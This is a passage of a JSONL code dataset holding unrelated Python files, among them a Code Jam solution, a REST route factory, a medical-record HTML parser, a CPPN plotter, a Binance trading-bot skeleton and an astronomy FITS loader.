len(string_list)):\r\n string_bit = current_prod + string_list[i]\r\n current_prod = mult_dict[string_bit]\r\n current_sign *= sign_dict[string_bit]\r\n if current_sign == -1:\r\n return '-' + current_prod\r\n else:\r\n return current_prod\r\n\r\ndef get_running_product(string_list):\r\n # assume length at least 1\r\n out_string_list = []\r\n current_prod = string_list[0]\r\n current_sign = 1\r\n out_string_list.append(current_prod)\r\n for i in range(1, len(string_list)):\r\n string_bit = current_prod + string_list[i]\r\n current_prod = mult_dict[string_bit]\r\n current_sign *= sign_dict[string_bit]\r\n if current_sign == -1:\r\n out_string_list.append('-' + current_prod)\r\n else:\r\n out_string_list.append(current_prod)\r\n return out_string_list\r\n\r\ndef get_running_product_rev(string_list):\r\n # string_list should be reversed before running func\r\n # assume length at least 1\r\n out_string_list = []\r\n current_prod = string_list[0]\r\n current_sign = 1\r\n out_string_list.append(current_prod)\r\n for i in range(1, len(string_list)):\r\n string_bit = string_list[i] + current_prod\r\n current_prod = mult_dict[string_bit]\r\n current_sign *= sign_dict[string_bit]\r\n if current_sign == -1:\r\n 
out_string_list.append('-' + current_prod)\r\n else:\r\n out_string_list.append(current_prod)\r\n return out_string_list\r\n \r\n \r\n\r\nif __name__ == '__main__':\r\n\r\n input_file = open(input_file_name, 'r')\r\n output_file = open(output_file_name, 'w')\r\n\r\n # get info from input file\r\n file_line = input_file.readline()\r\n file_line = file_line.replace('\\n', '')\r\n num_cases = int(file_line)\r\n\r\n case_num = 1\r\n while True:\r\n possible = True\r\n file_line = input_file.readline()\r\n if file_line == '' or file_line == '\\n':\r\n input_file.close()\r\n break\r\n file_line = file_line.replace('\\n', '')\r\n file_line_list = file_line.split()\r\n L = int(file_line_list[0])\r\n X = int(file_line_list[1])\r\n\r\n letter_string = input_file.readline().replace('\\n', '')\r\n\r\n repeated_letter_string = letter_string*min(X, 25)\r\n## print(repeated_letter_string) ##\r\n string_list = [letter for letter in repeated_letter_string]\r\n## print(string_list) ##\r\n string_list_rev = string_list[::-1]\r\n\r\n # find cycle length\r\n product_string_list = get_running_product(string_list)\r\n## print(product_string_list) ##\r\n product_string_list_rev = get_running_product_rev(string_list_rev)\r\n## print(product_string_list_rev) ##\r\n for test_x in range(1, min(X, 25)):\r\n if product_string_list[test_x*L] == product_string_list[0]:\r\n cycle_length = test_x*L\r\n break\r\n else:\r\n cycle_length = 100000000 # arbitrary large number\r\n\r\n## print(cycle_length) ##\r\n \r\n # find first i index\r\n for letter_i, letter in enumerate(product_string_list):\r\n if letter == 'i':\r\n i_index = letter_i\r\n break\r\n else:\r\n## print('test1') ##\r\n possible = False\r\n\r\n## print(i_index) ##\r\n\r\n # find first k index\r\n for letter_i, letter in enumerate(product_string_list_rev):\r\n if letter == 'k':\r\n k_index = X*L - letter_i - 1\r\n break\r\n else:\r\n## print('test2') ##\r\n possible = False\r\n\r\n## print(k_index) ##\r\n\r\n\r\n if k_index - 1 <= i_index:\r\n## print('test3') ##\r\n possible = False\r\n\r\n # test for j\r\n if possible == True:\r\n j_length = (k_index - i_index - 1) % cycle_length\r\n## print(string_list[(i_index + 1):(i_index + 1 + j_length)]) ##\r\n## print(get_product(string_list[(i_index + 1):(i_index + 1 + j_length)])) ##\r\n if get_product(string_list[(i_index + 1):(i_index + 1 + j_length)]) == 'j':\r\n possible = True\r\n else:\r\n possible = False\r\n\r\n if possible == True:\r\n output = 'YES'\r\n else:\r\n output = 'NO'\r\n output_string = 'Case #' + str(case_num) + ': %s\\n' % output\r\n\r\n output_file.write(output_string) ##\r\n print(output_string)\r\n case_num += 1\r\n \r\n output_file.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"solutions_5670465267826688_1/Python/ScottyP/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"551924830","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\n\n# VM Mngr Exceptions\nEXCEPT_DO_NOT_UPDATE_PC = 1 << 25\n\nEXCEPT_CODE_AUTOMOD = (1 << 0)\nEXCEPT_SOFT_BP = (1 << 1)\nEXCEPT_INT_XX = (1 << 2)\nEXCEPT_BREAKPOINT_INTERN = (1 << 10)\n\nEXCEPT_ACCESS_VIOL = ((1 << 14) | EXCEPT_DO_NOT_UPDATE_PC)\n# VM Mngr constants\n\nPAGE_READ = 1\nPAGE_WRITE = 2\nPAGE_EXEC = 4\n\nBREAKPOINT_READ = 1\nBREAKPOINT_WRITE = 
2\n\n","sub_path":"miasm2/jitter/csts.py","file_name":"csts.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"301392385","text":"import os\nimport re\nimport inspect\nimport collections\nfrom .lib import RestMethods\nfrom queue import Queue\n\nfrom pype.api import Logger\n\nlog = Logger().get_logger(\"RestApiFactory\")\n\n\ndef prepare_fullpath(path, prefix):\n \"\"\"Concatenate registered path and prefix with right form.\n\n :param path: Registered url path for registered callback.\n :type path: str, list\n :param prefix: Registered and prepared url prefix.\n :type prefix: str, None\n :return: concatenated prefix and path in right form\n :rtype: str\n \"\"\"\n\n if isinstance(path, (list, tuple)):\n path_items = path\n else:\n path_items = [part for part in path.split(\"/\") if part]\n\n fullpath = \"/\"\n if path and prefix:\n items = [part for part in prefix.split(\"/\") if part]\n items.extend(path_items)\n fullpath = \"/\".join(items)\n if path.endswith(\"/\"):\n fullpath += \"/\"\n\n elif path:\n fullpath = \"/\".join(path_items)\n if path.endswith(\"/\"):\n fullpath += \"/\"\n\n elif prefix:\n fullpath = prefix\n\n if not fullpath.startswith(\"/\"):\n fullpath = \"/{}\".format(fullpath)\n\n return fullpath\n\n\ndef prepare_regex_from_path(full_path, strict_match):\n \"\"\"Prepare regex based on set path.\n\n When registered path do not contain dynamic keys regex is not set.\n Dynamic keys are specified with \"<\" and \">\" (\"<{dynamic key}>\").\n\n :param full_path: Full url path (prefix + path) for registered callback.\n :type full_path: str, list, None\n :return: regex and keys of all groups in regex\n :rtype: tuple(SRE_Pattern, list), tuple(None, None)\n \"\"\"\n get_indexes_regex = \"<[^< >]+>\"\n all_founded_keys = re.findall(get_indexes_regex, full_path)\n if not all_founded_keys:\n return None, None\n\n regex_path = full_path\n keys = []\n for key in all_founded_keys:\n replacement = \"(?P{}\\w+)\".format(key)\n keys.append(key.replace(\"<\", \"\").replace(\">\", \"\"))\n if not strict_match:\n if full_path.endswith(key):\n replacement = \"?{}?\".format(replacement)\n regex_path = regex_path.replace(key, replacement)\n\n regex_path = \"^{}$\".format(regex_path)\n\n return re.compile(regex_path), keys\n\n\ndef prepare_prefix(url_prefix):\n \"\"\"Check if the url_prefix is set and is in correct form.\n\n Output is None when prefix is empty or \"/\".\n\n :param url_prefix: Registered prefix of registered callback.\n :type url_prefix: str, list, None\n :return: Url prefix of registered callback\n :rtype: str, None\n \"\"\"\n if url_prefix is None or url_prefix.strip() == \"/\":\n return None\n elif isinstance(url_prefix, (list, tuple)):\n url_prefix = \"/\".join(url_prefix)\n else:\n items = [part for part in url_prefix.split(\"/\") if part]\n url_prefix = \"/\".join(items)\n\n if not url_prefix:\n return None\n\n while url_prefix.endswith(\"/\"):\n url_prefix = url_prefix[:-1]\n\n if not url_prefix.startswith(\"/\"):\n url_prefix = \"/{}\".format(url_prefix)\n\n return url_prefix\n\n\ndef prepare_methods(methods, callback=None):\n \"\"\"Check and convert entered methods.\n\n String `methods` is converted to list. All values are converted to\n `RestMethods` enum object. 
Invalid methods are ignored and printed out.\n\n :param methods: Contain rest api methods, when callback is called.\n :type methods: str, list\n :param callback: Registered callback, helps to identify where is\n invalid method.\n :type callback: function, method, optional\n :return: Valid methods\n :rtype: list\n \"\"\"\n invalid_methods = collections.defaultdict(list)\n\n if not methods:\n _methods = [RestMethods.GET]\n elif isinstance(methods, str) or isinstance(methods, RestMethods):\n _method = RestMethods.get(methods)\n _methods = []\n if _method is None:\n invalid_methods[methods].append(callback)\n else:\n _methods.append(_method)\n\n else:\n _methods = []\n for method in methods:\n found = False\n _method = RestMethods.get(method)\n if _method is None:\n invalid_methods[methods].append(callback)\n continue\n\n _methods.append(_method)\n\n for method, callbacks in invalid_methods.items():\n callback_info = \"\"\n\n callbacks = [cbk for cbk in callbacks if cbk]\n if len(callbacks) > 0:\n multiple_ind = \"\"\n if len(callbacks) > 1:\n multiple_ind = \"s\"\n\n callback_items = []\n for callback in callbacks:\n callback_items.append(\"\\\"{}<{}>\\\"\".format(\n callback.__qualname__, callback.__globals__[\"__file__\"]\n ))\n\n callback_info = \" with callback{} {}\".format(\n multiple_ind, \"| \".join(callback_items)\n )\n\n log.warning(\n (\"Invalid RestApi method \\\"{}\\\"{}\").format(method, callback_info)\n )\n\n return _methods\n\n\ndef prepare_callback_info(callback):\n \"\"\"Prepare data for callback handling when should be triggered.\"\"\"\n callback_info = inspect.getfullargspec(callback)\n\n callback_args = callback_info.args\n callback_args_len = 0\n if callback_args:\n callback_args_len = len(callback_args)\n if type(callback).__name__ == \"method\":\n callback_args_len -= 1\n\n defaults = callback_info.defaults\n defaults_len = 0\n if defaults:\n defaults_len = len(defaults)\n\n annotations = callback_info.annotations\n\n return {\n \"args\": callback_args,\n \"args_len\": callback_args_len,\n \"defaults\": defaults,\n \"defaults_len\": defaults_len,\n \"hasargs\": callback_info.varargs is not None,\n \"haskwargs\": callback_info.varkw is not None,\n \"annotations\": annotations\n }\n\n\nclass _RestApiFactory:\n \"\"\"Factory is used to store and prepare callbacks for requests.\n\n Should be created only one object used for all registered callbacks when\n it is expected to run only one http server.\n \"\"\"\n registered_objs = []\n unprocessed_routes = []\n unprocessed_statics = Queue()\n\n prepared_routes = {\n method: collections.defaultdict(list) for method in RestMethods\n }\n prepared_statics = {}\n\n has_routes = False\n\n def has_handlers(self):\n return (self.has_routes or self.prepared_statics)\n\n def _process_route(self, route):\n return self.unprocessed_routes.pop(\n self.unprocessed_routes.index(route)\n )\n\n def register_route(\n self, path, callback, url_prefix, methods, strict_match\n ):\n log.debug(\"Registering callback for item \\\"{}\\\"\".format(\n callback.__qualname__\n ))\n route = {\n \"path\": path,\n \"callback\": callback,\n \"url_prefix\": url_prefix,\n \"methods\": methods,\n \"strict_match\": strict_match\n }\n self.unprocessed_routes.append(route)\n\n def register_obj(self, obj):\n \"\"\"Register object for decorated methods in class definition.\"\"\"\n self.registered_objs.append(obj)\n\n def register_statics(self, item):\n log.debug(\"Registering statics path \\\"{}\\\"\".format(item))\n self.unprocessed_statics.put(item)\n\n def 
_prepare_route(self, route):\n \"\"\"Prepare data of registered callbacks for routes.\n\n Registration info are prepared to easy filter during handling\n of requests.\n\n :param route: Contain all necessary info for filtering and\n handling callback for registered route.\n :type route: dict\n \"\"\"\n callback = route[\"callback\"]\n methods = prepare_methods(route[\"methods\"], callback)\n url_prefix = prepare_prefix(route[\"url_prefix\"])\n fullpath = prepare_fullpath(route[\"path\"], url_prefix)\n regex, regex_keys = prepare_regex_from_path(\n fullpath, route[\"strict_match\"]\n )\n callback_info = prepare_callback_info(callback)\n\n for method in methods:\n self.has_routes = True\n self.prepared_routes[method][url_prefix].append({\n \"regex\": regex,\n \"regex_keys\": regex_keys,\n \"fullpath\": fullpath,\n \"callback\": callback,\n \"callback_info\": callback_info\n })\n\n def prepare_registered(self):\n \"\"\"Iter through all registered callbacks and statics to prepare them.\n\n First are processed callbacks registered with decorators in classes by\n registered objects. Remaining callbacks are filtered, it is checked if\n methods has `__self__` or are defined in (it is expeted they\n do not requise access to object)\n \"\"\"\n\n while not self.unprocessed_statics.empty():\n url_prefix, dir_path = self.unprocessed_statics.get()\n dir_path = os.path.normpath(dir_path)\n if not os.path.exists(dir_path):\n log.warning(\n \"Directory path \\\"{}\\\" was not found\".format(dir_path)\n )\n continue\n url_prefix = prepare_prefix(url_prefix)\n self.prepared_statics[url_prefix] = dir_path\n\n for obj in self.registered_objs:\n method_names = [\n attr for attr in dir(obj)\n if inspect.ismethod(getattr(obj, attr))\n ]\n for method_name in method_names:\n method = obj.__getattribute__(method_name)\n if not hasattr(method, \"restapi\"):\n continue\n\n if not method.restapi:\n continue\n\n for route in list(self.unprocessed_routes):\n callback = route[\"callback\"]\n if not (\n callback.__qualname__ == method.__qualname__ and\n callback.__module__ == method.__module__ and\n callback.__globals__[\"__file__\"] == (\n method.__globals__[\"__file__\"]\n )\n ):\n continue\n\n route[\"callback\"] = method\n self._process_route(route)\n self._prepare_route(route)\n break\n\n for route in list(self.unprocessed_routes):\n callback = route[\"callback\"]\n is_class_method = len(callback.__qualname__.split(\".\")) != 1\n if is_class_method:\n missing_self = True\n if hasattr(callback, \"__self__\"):\n if callback.__self__ is not None:\n missing_self = False\n\n if \"\" in callback.__qualname__:\n pass\n\n elif missing_self:\n log.warning((\n \"Object of callback \\\"{}\\\" from \\\"{}\\\" is not\"\n \" accessible for api. 
Register object or\"\n \" register callback with already created object\"\n \"(not with decorator in class).\".format(\n callback.__qualname__,\n callback.__globals__[\"__file__\"]\n )\n ))\n continue\n\n self._prepare_route(route)\n continue\n\n self._prepare_route(route)\n","sub_path":"pype/modules/rest_api/lib/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":11446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"262457719","text":"import os\nimport json\nfrom bs4 import BeautifulSoup\n\nexport_data = list()\nfile_dir = input('Please input html file direction: ')\n\nfor dirPath, dirNames, fileNames in os.walk(file_dir):\n for f in fileNames:\n filePath = os.path.join(dirPath, f)\n if \"醫令明細表\" in filePath:\n soup = BeautifulSoup(open(filePath))\n\n id_number = soup.find(id = \"cph_lblID3\").string\n\n tr_list = soup.find_all(\"tr\")\n hospital = str()\n year = int()\n month = int()\n day = int()\n\n index = 9\n while True:\n td_list = tr_list[index].find_all(\"td\")\n if len(td_list) == 1: # skip \n pass\n elif len(td_list) == 4: # parse drug\n medical_order = td_list[1].string.split()[0]\n if len(medical_order) == 10:\n medical_name = td_list[2].div.string.split()[0]\n medical_volume = float(td_list[3].string.split()[0])\n medical_dict = {\n \"id_number\": id_number,\n \"hospital\": hospital,\n \"year\": year,\n \"month\": month,\n \"day\": day,\n \"medical_order\": medical_order,\n \"medical_name\": medical_name,\n \"medical_volume\": medical_volume\n }\n export_data.append(medical_dict)\n elif len(td_list) == 18:\n break\n else: # parse hospital\n hospital = td_list[1].string.split()[0]\n date = str(td_list[2]).split()[4].split(\"<\")[0].split(\"/\")\n if date[0] == '':\n date = str(td_list[3]).split()[4].split(\"<\")[0].split(\"/\")\n year = int(date[0])\n month = int(date[1])\n day = int(date[2])\n else:\n year = int(date[0])\n month = int(date[1])\n day = int(date[2])\n\n index += 1\n\nwith open(\"medical_data.json\", \"w\") as f:\n json.dump(export_data, f, ensure_ascii=False, indent=4)\n","sub_path":"parse_drug_html.py","file_name":"parse_drug_html.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"173398632","text":"#! usr/bin/env python\n\n\"\"\"\nAssignment 14_Task3:\n\nWritten without using map.\nTried many times without any success, so here is the script doing the same \\\nthing without using map :(\n\nCreated by Shraddha Shrestha on March 15, 2016.\nCopyright 2016 Shraddha Shrestha. 
All rights reserved.\n\n\"\"\"\n\nimport os\nimport argparse\nimport glob\n\n\ndef get_parser():\n \"\"\"Get directory information from user\"\"\"\n parser = argparse.ArgumentParser(\n description=\"\"\"Getting access to files in user's directory input\"\"\")\n parser.add_argument(\n \"--directory\",\n required = True,\n type=str,\n help=\"\"\"user's input directory with files, copy directory address/\\\n path as a text (right click on directory)\"\"\"\n )\n return parser.parse_args()\n\n\ndef sum_of_integers(A):\n #my_files = glob.glob(os.path.join(args.directory, '*.txt'))\n total = 0\n #print(my_files)\n for file in A:\n #print(file)\n with open(file, 'r') as f:\n for line in f:\n for word in line.split():\n #print(word)\n total = total + int(word)\n return total\n\n\ndef main():\n args = get_parser()\n my_files = glob.glob(os.path.join(args.directory, '*.txt'))\n result = sum_of_integers(my_files)\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"answers/sthshraddha/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"146056678","text":"\"\"\"\nGet station pair information from the CC stacks based on file names\n\"\"\"\nimport os \nfrom glob import glob\nfrom obspy import read\n\n\nnetstas_a = []\nnetstas_b = []\nlats = dict()\nlons = dict()\nwith open(\"station_pairs.txt\", \"w\") as f:\n for dir_ in glob(\"SAC_I3_stack_4_Zendo/*_stack\"):\n phase, _, typ, _ = os.path.basename(dir_).split(\"_\")\n for dir_ in sorted(glob(os.path.join(dir_, \"*_*\"))):\n for i, fullpath in enumerate(sorted(glob(os.path.join(dir_, \"*\")))):\n fid = os.path.basename(fullpath)\n fid = os.path.splitext(fid)[0]\n _, net_a, sta_a, net_b, sta_b = fid.strip().split(\"_\")\n if i == 0:\n f.write(f\"{phase.upper()} {typ.upper()} {net_a}.{sta_a}\\n\")\n f.write(f\"\\t{net_b}.{sta_b}\\n\")\n\n netsta_a = f\"{net_a} {sta_a}\"\n netsta_b = f\"{net_b} {sta_b}\"\n if netsta_a not in netstas_a:\n netstas_a.append(netsta_a)\n if netsta_b not in netstas_b:\n netstas_b.append(netsta_b)\n st = read(fullpath)\n lats[netsta_b] = st[0].stats.sac.stla\n lons[netsta_b] = st[0].stats.sac.stlo\n\n\nassert(len(netstas_a) == len(netstas_b))\n\nwith open(\"STATIONS_LIU2022\", \"w\") as f:\n for netsta in sorted(netstas_b):\n net, sta = netsta.split(\" \")\n f.write(f\"{sta:>6}{net:>6}{lats[netsta]:11.4f}{lons[netsta]:11.4f}{0:7.1f}{0:7.1f}\\n\")\n\n","sub_path":"simulations/ambient_noise_adjtomo/get_station_pairs.py","file_name":"get_station_pairs.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600402206","text":"import matplotlib.pyplot as plt\nimport fast_cppn\nimport quad_tree\nimport queue\nimport random\n\n\ndef get_pattern(cppn, x1, y1, x2_range=[-1, 1], y2_range=[-1, 1],\n step=0.05, threshold=None):\n import numpy as np\n output = []\n i = 0\n for y in np.arange(y2_range[0], y2_range[1], step):\n output.append([])\n for x in np.arange(x2_range[0], x2_range[1], step):\n temp = cppn.run(x1,y1,x,y)[0]\n\n if threshold is not None:\n if abs(temp) > threshold:\n output[i].append(temp)\n else:\n output[i].append(0)\n else:\n output[i].append(temp)\n cppn.restart_network()\n i += 1\n return np.array(output)\n\ndef show_cppn(output, colormap=\"BuGn\"):\n import matplotlib.pyplot as plt\n\n cs = plt.contourf(output, 100, cmap=colormap,\n origin='lower',extent=[-1, 1, -1, 1])\n 
plt.colorbar()\n ax = plt.gca() # gca stands for 'get current axis'\n ax.spines['bottom'].set_position(('data', 0))\n ax.spines['left'].set_position(('data', 0))\n\n return ax\n\n\ndef overlay_tree(pattern, quad_tree, var_thr,colormap=\"autumn\"):\n ax = show_cppn(pattern, colormap)\n q = queue.Queue()\n q.put(quad_tree)\n while not q.empty():\n p = q.get()\n if p.variance > var_thr:\n for child in p.children:\n q.put(child)\n else:\n ax.add_patch(plt.Rectangle((p.x-p.width,p.y-p.width), p.width*2, p.width*2, alpha = 1, fill = None))\n ax.add_patch(plt.Circle((p.x,p.y), 0.01, fc = 'r'))\n\n q.task_done()\n plt.show()\n return\n\n\ndef plot_quadtree(quad_tree, var):\n ax = plt.gca()\n q = queue.Queue()\n q.put(quad_tree)\n while not q.empty():\n p = q.get()\n if p.variance > var_thr:\n for child in p.children:\n q.put(child)\n else:\n if p.weight < 0.5:\n ax.add_patch(plt.Rectangle((p.x-p.width,p.y-p.width), p.width*2, p.width*2, alpha = 0.5, color = 'k'))\n ax.add_patch(plt.Circle((p.x,p.y), 0.01, fc = 'r'))\n q.task_done()\n plt.axis([-1, 1, -1, 1])\n ax.spines['bottom'].set_position(('data', 0))\n ax.spines['left'].set_position(('data', 0))\n plt.show()\n return\n\ndef get_rectangle(node, color):\n x, y = offset_center(node)\n return plt.Rectangle((x, y), node.width, node.width, fc=color)\n\n\ntest_net = fast_cppn.fast_network(4, 1, node_count=5)\ntest_net.add_connection(0, 4, 5.)\ntest_net.add_connection(1, 4, 5.)\ntest_net.add_connection(2, 4, 5.)\ntest_net.add_connection(3, 4, 5.)\n\ntest_net.set_activation_function(0, 0)\ntest_net.set_activation_function(1, 0)\ntest_net.set_activation_function(2, 0)\ntest_net.set_activation_function(3, 0)\ntest_net.set_activation_function(4, 3)\n\ndiv_thr = 0.003\nvar_thr = 0.003\nband_thr = 0.003\n\npattern = get_pattern(test_net,0,0)\nqtr = quad_tree.Quadtree()\n\n #a, b, cppn, div_thr = 0.03 , outgoing = False, initialDepth =4, maxDepth = 4\nqtr.division_initialization(0, 0, test_net)\n\nprint(qtr.prune_extract(0,0,qtr,test_net))\noverlay_tree(pattern, qtr, var_thr, \"bone\")\n\n","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"467344282","text":"#!/usr/bin/python\n#coding:utf-8\nimport datetime\nimport gc\nimport traceback\n\nimport numpy\nfrom sqlalchemy import or_\n\nfrom market_strategy import config\nfrom market_strategy.MyDBSession import MyDBSession\nfrom market_strategy.common.ServerJiao import ServerJiao\nfrom market_strategy.entity.BinanceEntity import BinanceEntity\nfrom market_strategy.http_server.myServer import flask_app\nfrom market_strategy.market_pair.binancePair import BinancePair\nfrom market_strategy.myLogger import log as logger\nimport time\nfrom concurrent.futures import ThreadPoolExecutor, wait, thread\nfrom market_strategy.Order import Order,DBSession\nfrom tools.binance.client import Client\n\n\nclass StrategyCLI:\n def __init__(self):\n self.market_pairs = []\n self.market_sell_pairs = []\n\n def base_init(self):\n self.get_binance()\n self.init_db_config()\n self.game_start=True\n self.threadpool_30m = ThreadPoolExecutor(max_workers=1)\n self.threadpool_flask = ThreadPoolExecutor(max_workers=1)\n self.flask_threadpool_run()\n\n def get_binance(self):\n try:\n self.binance = Client(config.binance_key,\n config.binance_secret)\n except Exception as e:\n self.get_binance()\n\n def main(self):\n logger.debug(\"main\")\n self.base_init()\n self.create_bean()\n\n\n try :\n 
self.loop()\n except Exception as e:\n logger.fatal(\"宕机了。。。。。。。。。\")\n traceback.print_exc()\n logger.fatal(e)\n self.loop()\n\n def create_bean(self):\n all_tickers = self.binance.get_all_tickers()\n sell_tickers=self.get_waiting_sell(self.init_db_config())\n binance_coin_pairs_30m =sell_tickers.append(all_tickers)\n\n for value_map in binance_coin_pairs_30m:\n symbol=value_map[\"symbol\"]\n if(symbol.find(\"BTC\",2)>0):\n merge_bean = BinancePair(value_map[\"symbol\"],\"30m\",self.binance )\n self.market_pairs.append(merge_bean)\n\n def loop(self):\n while(True):\n for market_pair in self.market_pairs:\n if(market_pair.time_type == \"5m\"):\n self.threadpool_5m_run(market_pair)\n elif(market_pair.time_type == \"15m\"):\n self.threadpool_15m_run(market_pair)\n elif(market_pair.time_type == \"30m\"):\n self.threadpool_30m_run(market_pair)\n\n time.sleep(config.refresh_rate)\n\n # 为线程定义一个函数\n def start_sell_pairs(self,mod):\n if(mod == 3):\n self.create_waiting_sell_bean()\n for market_pair in self.market_sell_pairs:\n self.sell_threadpool_run(market_pair)\n pass\n\n def sell_threadpool_run(self,market_pair):\n futures = []\n futures.append(self.sell_threadpool.submit(self.market_get_data,market_pair))\n\n def flask_threadpool_run(self):\n logger.warn(\"flask is running\")\n futures = []\n #futures.append(self.threadpool_flask.submit(self.run_flask,flask_app))\n\n def threadpool_30m_run(self,market_pair):\n futures = []\n futures.append(self.threadpool_30m.submit(self.market_get_data,market_pair))\n\n\n def market_get_data(self,market_pair):\n market_pair.get_history_data()\n\n def get_waiting_sell(self,config):\n # 创建session对象:\n myDBsession=MyDBSession()\n DBSessionClass=myDBsession.getDBSessionClass(config)\n session = DBSessionClass()\n\n order_result = session.query(Order).filter( or_( Order.type == 0 ,Order.type == 2) ) \\\n .filter(Order.strategy_type == self.strategy_type)\n\n #说明有成交的买单,那么就可以进行卖出操作了\n #更新数据库\n order_list=order_result.all()\n return order_list\n\n def init_db_config(self,username=config.username,password=config.password,ip=config.ip,db_name=config.db):\n self.config={}\n self.config[\"username\"]=username\n self.config[\"password\"]=password\n self.config[\"ip\"]=ip\n self.config[\"db_name\"]=db_name\n self.game_flag = False\n\n def run_flask(self,flask_app):\n return\n flask_app.strategy_bean = self\n #flask_app.run(host='0.0.0.0',port=5000,debug=True)\n\n def sell_all(self):\n result=self.binance.get_open_orders()\n for entity in result:\n binance_entity=BinanceEntity(**entity)\n\n #撤单,\n cancel_result=self.binance.cancel_order(symbol=binance_entity.symbol,orderId=binance_entity.orderId)\n ServerJiao.send_server_warn(desp=cancel_result,text=binance_entity.symbol+':撤单'+binance_entity.side)\n\n\n balance_data_list=self.binance.get_account()[\"balances\"]\n\n for entity in balance_data_list:\n symbol=entity[\"asset\"]\n free = float(entity[\"free\"])\n\n if free <1:\n continue\n\n symbol=symbol+\"ETH\"\n try :\n free=numpy.floor(free)\n self.binance.order_market_sell(symbol=symbol,quantity=free)\n ServerJiao.send_server_warn(desp=cancel_result,text=binance_entity.symbol+':卖出'+binance_entity.side)\n except Exception as e:\n continue\n\n message=\"指令sell_all执行完毕\"\n ServerJiao.send_server_warn(message)\n return message\n\n def change_eth_left(self,amount):\n config.eth_left_size=amount\n return \"change_eth_left successfully : \"+config.eth_left_size\n\n def change_game(self):\n config.market_game_start=not(config.market_game_start)\n return \"change_game successfully 
: \"+config.market_game_start\n\ndef main():\n cli = StrategyCLI()\n cli.main()\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"market_strategy/strategy/base_strategy.py","file_name":"base_strategy.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"125694504","text":"import numpy as np\r\n\r\nN = 4\r\nM = 6\r\n\r\nA = np.random.randint(-10, 10, (N, M))\r\nprint(\"Матрица:\" + str(A))\r\n\r\nsum_elements = np.sum(A)\r\nsum_cols = np.sum(A, axis=1)\r\nA = np.column_stack((A, sum_cols/sum_elements))\r\n\r\nprint(\"Новая матрица: \" + str(A))","sub_path":"Копытов/2/задача 7.py","file_name":"задача 7.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"524133688","text":"# Copyright (c) 2016 by Mike Jarvis and the other collaborators on GitHub at\n# https://github.com/rmjarvis/Piff All rights reserved.\n#\n# Piff is free software: Redistribution and use in source and binary forms\n# with or without modification, are permitted provided that the following\n# conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the disclaimer given in the accompanying LICENSE\n# file.\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the disclaimer given in the documentation\n# and/or other materials provided with the distribution.\n\n# Test routines for the pixellated Piff PSF model\n\"\"\"\nProgram to fit a set of stars in a FITS image using stars listed in a FITS table.\n\"\"\"\n\nimport numpy as np\nimport galsim\nimport astropy.io.fits as pyfits\nimport piff\n\nimport logging\n\ndef stardata_from_fits(hdu_list, xysky, stamp_size=51, badmask=0x7FFF,\n logger=None):\n \"\"\"Create StarData instances from data in FITS hdu's.\n\n :param scihdu: An astropy FITS HDU list holding the science image\n and weight image extensions.\n :param xysky: list of (x,y,sky) tuples for stars\n :param stamp_size: size of postage stamp to use\n :param badmask: Bits set in mask plane that invalidate a pixel.\n [Note: don't use bit 15, it is usually messed up\n due to int/uint confusions in FITS readers.]\n\n :returns: StarData instance\n \"\"\"\n # Get the image data and weight and mask planes\n sci_extn = -1\n wgt_extn = -1\n msk_extn = -1\n for i,extn in enumerate(hdu_list):\n try:\n desext = extn.header['DES_EXT'].strip()\n if desext=='IMAGE':\n sci_extn = i\n elif desext=='WEIGHT':\n wgt_extn = i\n elif desext=='MASK':\n msk_extn = i\n except KeyError:\n pass\n\n # ??? 
Errors if extensions are <0\n def fatal(msg,logger):\n if logger:\n logger_error(msg)\n print(msg)\n sys.exit(1)\n\n if sci_extn<0:\n fatal('Cannot find IMAGE extension of FITS file')\n if msk_extn<0:\n fatal('Cannot find MASK extension of FITS file')\n if wgt_extn<0:\n fatal('Cannot find WEIGHT extension of FITS file')\n\n sci = galsim.fits.read(hdu_list=hdu_list[sci_extn], compression='rice')\n wgt = galsim.fits.read(hdu_list=hdu_list[wgt_extn], compression='rice')\n msk = galsim.fits.read(hdu_list=hdu_list[msk_extn], compression='rice')\n hdr = hdu_list[sci_extn].header\n\n # Null weights using mask bits\n good = np.bitwise_and(msk.array.astype(np.uint16), badmask)==0\n wgt *= np.where(good, 1., 0.)\n\n # Determine gain and telescope pointing\n props = {}\n try:\n props['gain'] = hdr['GAIN']\n except KeyError:\n # Try GAINA if no GAIN ??? pick correct side??\n props['gain'] = hdr['GAINA']\n\n # Get exposure pointing from header\n ra = galsim.Angle(hdr['CRVAL1'],galsim.degrees)\n dec = galsim.Angle(hdr['CRVAL2'],galsim.degrees)\n ra = galsim.HMS_Angle(hdr['TELRA'])\n dec = galsim.DMS_Angle(hdr['TELDEC'])\n pointing = galsim.CelestialCoord(ra,dec)\n if logger:\n logger.info(\"pointing = %s hours, %s deg\", pointing.ra/galsim.hours,\n 